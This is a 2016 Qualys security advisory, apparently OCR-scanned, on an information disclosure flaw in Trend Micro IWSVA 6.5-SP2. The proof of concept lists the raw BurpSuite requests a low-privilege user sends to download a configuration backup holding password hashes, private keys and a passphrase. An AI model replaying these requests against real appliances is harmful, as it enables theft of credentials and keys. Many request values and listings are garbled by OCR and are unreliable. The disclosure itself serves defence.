Qualys Security Advisory QSA-2016-11-02 


November 02, 2016 


Sensitive Information Disclosure Vulnerability in Trend Micro Interscan Web Security Virtual 
Appliance (IWSVA) 6.5.x 
SYNOPSIS: 


TrendMicro InterScan Web Security Virtual Appliance (IWSVA) suffers from Sensitive Information Disclosure 
vulnerability. 


Reference: http://downloadcenter.trendmicro.com/?prodid=86&regs=NABU 


VULNERABILITY DETAILS: 


Lab Setup: 


1. Target Hostname: TrendMicrolWSVA6.5SP2 
2. Target IP Address: 192.168.253.150 
3. Kali Machine IP: 192.168.253.136 


Vulnerable/Tested Version: 


InterScan Web Security Virtual Appliance version 6.5-SP2_Build_Linux_1707.Older versions are also 
affected. 
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Patch Information 

IWSVA 6.5SP2 EN Patch 1 Build 1707 
IWSVA 6.5-SP2 Hot Fix Build 1622 
IWSVA 6.5-SP2 Critical Patch Build 1620 


IWSVA 6.5-SP2 Critical Patch Build 1608 
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10/25/16 10:06:16 PM 
10/25/16 9:59:53 PM 
10/25/16 9:55:19 PM 
10/25/16 9:44:12 PM 


Note: All the vulnerabilities mentioned in this report were tested with a least privileged user account ‘test’. This 
user has ‘Reports Only’ role assigned. 
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Vulnerability 1: Sensitive Information Disclosure Vulnerability 


An authenticated remote user with least privilege/role (a user with ‘Reports only’ role) can download 


configuration backup file from the system. 


Risk Factor: Medium 


Impact: 


An attacker with low privileges can abuse the ConfigBackup functionality to backup system configuration and 
download it on his local machine. This backup file contains sensitive information like passwd/shadow files, 
RSA certificates, Private Keys and Default Passphrase etc. 


CVSS Score: AV:N/AC:L/AU:S/C:C/1:C/A:C 


Proof-Of-Concept: 


1. Log into IWSVA web console with least privilege user ‘test’. 


Note down ‘CSRFGuardToken’ and ‘JSESSIONID’ values for this session. 


€) © | 192.168.253.150:1812/index:jsp?SREGUSTETORERSISAZMAAT2AMINGEOXARZLVYKOSVGAKZBScumr | CQ Search wid $a OU #\- @ = 
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| InterScan™ Web Security Virtual Appliance maemae G Loa off | OEE a RF 


fD) TREND. 
2 


Total Ransomware Detections:0 ^ 
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Daobiicani | Top URL Categories Accessed 14:52:41 | Top Users blocked by internet security 14:52:41 
Password [an v [Today v|[s_v] (ih) @ all v [Today v|[5_ (ali) è 
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dashboard_query 


MB 192.168.253.150:1812 ®Bxhr 


dashboard_query 
@ 200 POST — dashboard_query MB 192.168.253.150:1812 @xhr 
@ 20 POST — dashboard_query {Æ 192.168,253,150:1812 Bxhr 


json 


POST | 


http://192.168,253,150:1812/rest/commonlog/dashboard_query 


Request Headers: 


json 


Accept: application/json, text/javascript, */*; q=0.01 
Accept-Language: en-US,en;q=0,5 

Accept-Encoding: gzip, deflate 

Content-Type: application/x-www-form-urlencoded; charset=UTF-8 
X-Requested-With: XMLHttpRequest 

Referer: http://192.168.253.150:1812/log/page/dashboard.html 

c . 


json 


3. Send following POST request using BurpSuite Repeater with ‘CSRFGuardToken’ and ‘JSSESSIONID’ 
values obtained earlier. Follow redirections in BurpSuite to complete the request. 


| Cookie: JSESSIONID=E4FAA438E206F10153DBA5D9CB2BE0OFC 


| CSRFGuardToken=J3 AZMAA 12AMJNBFOXAR2LV YKQS5VQIKZB &op=save &uploadfile=& 
beFullyOrPartially=0 


[Go| Cancel (< i" | (>17 | [Follow redirection Target: http://192.168.253.150:1812 |.#| |? | 
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-servlet . ConfigBackup?act ion=e: und 
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e 0 (Windeds Nt dün, otea: evidi. Gacks/z onai Firefox/49.0 
xhtml+xml, application/xml; q=0.9, */* 


168.253. 150; 1812/config_backup_progress.jsp?CSRFGuardToken=J3 AZMAA12 ANJNBFOXARSLVYKQSVQLKZBcop=export 
gth: 0 
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4. Send following POST request using BurpSuite Repeater with ‘CSRFGuardToken’ and ‘JSSESSIONID’ 
values obtained earlier. 


Cookie: JSESSIONID=E4FAA438E206F10153DBA5D9CB2BEOFC 


Target: http://192.168.253.150:1812 s @ 


ETTP/1.1 200 OK 
Server: Apache-Coyote/1.1 

Content-Disposition: attachment; filename="IVSVAE. 5-5 
Content-Type: APPLICATION/OCTET-STREAN 

: 2918400 

Date: Wed, 02 Nov 2016 09:33:03 GĦT 

Connection: close 


Config.tar™ 


Conf igurat ions /oqqg00000R000000000 
2000007 €300000000000001300¢33110S00130230 


DOO THDROOOCOOOSOONOG, =O°OOOOEXtSoftwarsOAdebe ImageReadyqE+<CO0diTXeXML: com. adobe. xmpOOO00<?xpacket begin="ini” 
Jd="WSNOMpCehiHzreSzNTczkcSa"?> <x:xmpmeta xmins:x="adobeins:meta/" x:xmptk="Adobe XMP Core 5.0-cOEO 61.134777, 
2010/02/12-17:32:00 "> <rdt:RDF xmlns:rdf="http:// eww. v3.org/1999/02/22-rdt-syntax-ns#"> <rdt: 
* xmina:xmpMh= "http: //ns. adobe. com/xap/1.0/mu/" 


POST /servlet/com.trend. iwss.gui.servlet.ConfigBackup?action=download HTTP/1.1 
Host: 192.168.253.150:1812 


User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0 


Accept: text/html, application/xhtml+xml, application/xml;q=0.9,*/*;q=0.8 
Accept-Language: en-US,en;q=0.5 

Accept-Encoding: gzip, deflate 

Refere: http://192.168.253.150:1812/config_backup_result.jsp?op=export 
Cookie: JSESSIONID=E4FAA438E206F 10153DBASDSCB2BEOFC 

Connection: close 

Upgrade-Insecure-Requests: 1 

Content-Type: application/x-www-form-urlencoded 

Content-Length: 158 


CSRFGuardToken=J3 AZMAA12 AMJNBFOXARZLVYKQSVOLKZBéop=2 &ImEx_success=1épkg_name=%2Fvars2Fiwsst2Fmigrations2Fexport%2F 


IWSVAGE.5-SP2_Config.tarsOD%0Aéhackup_return= 


Response 


[Headers | Hex | 
HTTP/1.1 200 OK 
Server: Apache-Coyote/1.1 
Content-Disposition: attachment; filename="IWSVA6.5-SP2_Config.ta 
Content-Type: APPLICATION/OCTET-STREAM 
Content-Length: 2918400 
Date: Wed, 02 Nov 2016 09:33:03 GMT 
Connection: close 


Conf igurat ions /OOO00000000000000000000000000000000000000000000000 
200000763000000000000013006€33 110500130230 
Soo0o0000000000o0000000000000000000000000000u00000d000u00u0u0u0d0u00u02u002d0u00200202 
OiscanDOOO00000000000000000000000 isc andoooooo00000000000000000000 
Oooooooo0oo0000o00000000000000000000000u000d0u2020u002ud02020u00u02ug000u00u02ugu000u0020002 
OoooooooooooooooooooooConfigurations/cap_icon. pngOOo0o0000000000000 
(0000000000000 644000007 62000007 €300000006420201300633 110000153010 
ooonoo0oo000000000000000000000000000000u000d002020202ugu202d02u002ug0202d02u0202g02020u0202ug0u002 


Send to Spider 
Do an active scan 
Do a passive scan 
Send to Intruder 
Send to Repeater 
Send to Sequencer 
Send to Comparer 
Send to Decoder 
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o 


O00 THDPOOO COON anOOOO, =0^0D00tEXtSoftwareDAdobe ImageReadyqÉe<000d 
id="WSMOMpCehiHzreSzNTezkeSd"?> <x:xmpmeta xmlns:x="adobe:ns:meta 
2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="http://www.w3.0 
| raf:about="" xmlns:xmpMM="http://ns. adobe. com/xap/1.0/mm/" 
xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmln 
xmpMM: Or iginalDocument ID="xmp.did:E5E055E3DDOCE011BC7EE2EF8B1097C 
xmpMM: Document ID="xmp . did: SAF6AAF2839F 11E18AE7969BC6F7A488" 
xmpMM: Instance ID="xmp. iid: SAF6AAF 1839F 11E1SAE7969BCéF7A488" xmp:C 
<xmoMM: DerivedFrom stRef: instance ID="xmp. iid: ADSFADDBSDS3E11186CA 
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Request 


[ Raw | Params | Headers | Hex | 


POST /servlet/com.trend. iwss.gui.servlet.ConfigBackup?action=download HTTP/1.1 
Host: 192.168.253.150:1812 

User-Agent: Mozilla/5.0 (Windows NT 10.0; WoW6é4; rv:49.0) Gecko/20100101 Firefox/49.0 
Accept: text/html,application/xhtml+xml, application/xml;q=0.9,*/*;q=0.8 
Accept-Language: en-US5,en;q=0.5 

Accept-Encoding: gzip, deflate 

Referer: http://192.168.253.150:1812/config_backup_result.jsp?op=export 

Cookie: JSESSIONID=E4FAA438E206F LOLS3DBASDSCB2BEOFC 

Connection: close 

Upgrade-Insecure-Requests: 1 

Content-Type: application/x-www-form-ur lencoded 

Content-Length: 158 


CSRFGuardToken=J3 AZMAA12 AMJNBFOXAR2 LVYKQSVQ1LKZB éop=2 &ImEx_success=1épkg_name=%2Fvar%s2Fiwss%2Fmigrations2Fexport%s2F 
TWSVA6.5-SP2_Config.tarsOD%0Aébackup_return= 


Show response in browser x 


To show this response in your browser, copy the URL below and paste 
into a browser that is configured to use Burp as its proxy. 


(_J In future, just copy the URL and don't show this dialog Close | 


€ © burp/show/7 


Ü Split URL 
>) Execute 


[C] Enable Post data [] : 
Opening IWSVA6.5-SP2_Config.tar 


Seekvicisia. 
(O IWSVA6.5-SP2_Config.tar 


which is: tar Archive (2.8 MB) 
Show response from: http://192.168.253.150:1812 


g What should Firefox do with this file? 
If you are not redirected shortl 


© OQpenwith — 7-Zip File Manager (default) 


= 


Do this automatically for files like this from now on. 


— 


6. This backup file discloses sensitive information such as Passwd and Shadow files, RSA certificates and 
Private Keys along with Default Passphrase. 


C:\Users\kkhot\Downloads\IWSVA6.5-SP2_Config(1).tar\Configurations\ 
File Edit View Favorites Tools Help 


i = y ẹ» > X% i 


Add Extract Test Copy Move Delete Info 


(B || CAUsers\kkhot\Downloads\IWSVA6.5-SP2_Config(1).tar\Configurations\ 


Name Size Packed Size Modified Mode User Group S 
223 482 272896 2016-10-28 12:13 Orwxr-xr-x root iscan 
@ crl 594 830 608768 2016-10-28 12:13 Orwxr-xr-x root iscan 
a dip_template 547 475 601600 2016-10-28 12:13 Orwxr-xr-x root iscan 
i https_ca 6 462 8192 2016-10-28 12:13 Orwxr-xr-x root iscan 
a ifcfg 431 1024 2016-10-28 12:13 Orwxr-xr-x root iscan 
GO pac_files 511 512 2016-10-28 12:13 Orwxr-xr-x root iscan 
a reverse_proxy 0 0 2016-10-28 12:13 Orwxr-xr-x root iscan 
B url 3852 4096 2016-10-28 12:13 Orwxr-xr-x root iscan 
fi] .default.passphrase | 34 512 2016-10-28 12:13 Orw-r--r-- iscan iscan 
&] Agent.ini 1552 2048 2016-10-28 12:13 Orwxr-xr-x iscan iscan 
&] aucfg.ini 236 512 2016-10-28 12:13 Orw-r----- iscan iscan 
$] AuthACL_http.ini 1195 1536 2016-10-28 12:13 Orw-r----- iscan iscan 
0 captive_portal.cert 1529 1536 2016-10-28 12:13 Orw-r----- iscan iscan 
O captive_portal.pkey 1751 2048 2016-10-28 12:13 Orw-r----- iscan iscan 
lē] captive_portal_auth_template.htm 2276 2560 2016-10-28 12:13 Orw-r--r-- iscan iscan 
{a cap_icon.png 26 754 27136 2016-10-28 12:13 Orw-r--r-- iscan iscan 
k) CDT_Config.ini 9 230 9728 2016-10-28 12:13 Orw-r----- iscan iscan 
bs ClientACL_ftp.ini 979 1024 2016-10-28 12:13 Orw-r----- iscan iscan 
&] ClientACL_http.ini 1409 1536 2016-10-28 12:13 Orw-r----- iscan iscan 
$] ClientConnectionQuotaWhiteList.ini 1447 1536 2016-10-28 12:13 Orw-r----- iscan iscan 

O clock 20 512 2016-10-28 12:13 Orw-r--r-- root root 

E] Commonlog.ini 2951 3072 2016-10-28 12:13 Orwxr-xr-x iscan iscan 
G crontab.iscan 1738 2048 2016-10-28 12:13 Orw-r----- iscan iscan 
(| crontab.root 416 512 2016-10-28 12:13 Orw-r----- iscan iscan 
“| Custom_Message 2 512 2016-10-28 12:13 Orw-r----- iscan iscan 
csredirect.tt 254 512 2016-10-28 12:13 Orw-r----- iscan iscan 
fs dcs_serverlist.ini 0 0 2016-10-28 12:13 Orw-r----- iscan iscan 
&] ddi_agent.ini 182 512 2016-10-28 12:13 Orw-r--r-- iscan iscan 
1407 1536 2016-10-28 12:13 Orw-r--r-- iscan iscan 
1751 2048 2016-10-28 12:13 Orw-r--r-- iscan iscan 
$] diagnostic_tool.ini 8 994 9216 2016-10-28 12:13 Orw-r--r-- iscan iscan 
| dtas.ini 583 1024 2016-10-28 12:13 Orw-r----- iscan iscan 
$] exception _list.ini 0 0 2016-10-28 12:13 Orw-r--r-- iscan iscan 
&] Except_list.ini 20 512 2016-10-28 12:13 Orwxr-xr-x iscan iscan 


C:\Users\kkhot\Downloads\IWSVA6.5-SP2_Config(1).tar\Configurations\ 
File Edit View Favorites Tools Help 


t = y ẹ» > X% i 


Add Extract Test Copy Move Delete Info 


ii C:\Users\kkhot\Downloads\IWSVA6,5-SP2_Config(1).tar\Configurations\ 


Name 

Bi passwd | 

lē] pas_adv.htm 

\@) pas_default.htm 
_] pas_policy 

_| pas_welcome 
|_| pg_hba.conf 

|_| pg_ident.conf 
7 postgresql.conf 


Bor peso 
f] Product.ini 


B rb.lst 
is] report_config.ini 


resolv.conf 


$à] reverse_proxy_settings.ini 
0 root 

“| S55sshd 

| S99lanbypass 


(=| server.xml 

‘| ServerFarmMemberList_http.ini 
| ServerlPWhiteList_ftp.ini 

x) ServerlPWhiteList_http.ini 


By :h2dow 


=| snmp_conf.ini 


safesearch_engine.xml 


Packed Size 
1024 
2 560 
2 048 


Modified 


2016-10-28 12:13 
2016-10-28 12:13 
2016-10-28 12:13 
2016-10-28 12:13 
2016-10-28 12:13 
2016-10-28 12:13 
2016-10-28 12:13 
2016-10-28 12:13 
2016-10-28 12:13 
2016-10-28 12:13 
2016-10-28 12:13 
2016-10-28 12:13 
2016-10-28 12:13 
2016-10-28 12:13 
2016-10-28 12:13 
2016-10-28 12:13 
2016-10-28 12:13 
2016-10-28 12:13 
2016-10-28 12:13 
2016-10-28 12:13 
2016-10-28 12:13 
2016-10-28 12:13 
2016-10-28 12:13 
2016-10-28 12:13 


Mode 


Orw-r--r-- 


Orwxr-xr-x 
Orw-r----- 
Orwxr-xr-x 


User 


root 

iscan 
iscan 
iscan 
iscan 
iscan 
iscan 
iscan 
iscan 
iscan 
iscan 
iscan 
root 

iscan 
root 

root 

root 

iscan 
iscan 
iscan 
iscan 
iscan 


CREDITS: 


The discovery and documentation of this vulnerability was conducted by Kapil Khot, Qualys 
Vulnerability Signature/Research Team. 


CONTACT: 


For more information about the Qualys Security Research Team, visit our website at 
http://www.qualys.com or send email to research @ qualys.com 


LEGAL NOTICE: 


The information contained within this advisory is Copyright (C) 2016 Qualys Inc. It may be redistributed 
provided that no fee is charged for distribution and that the advisory is not modified in any way. 


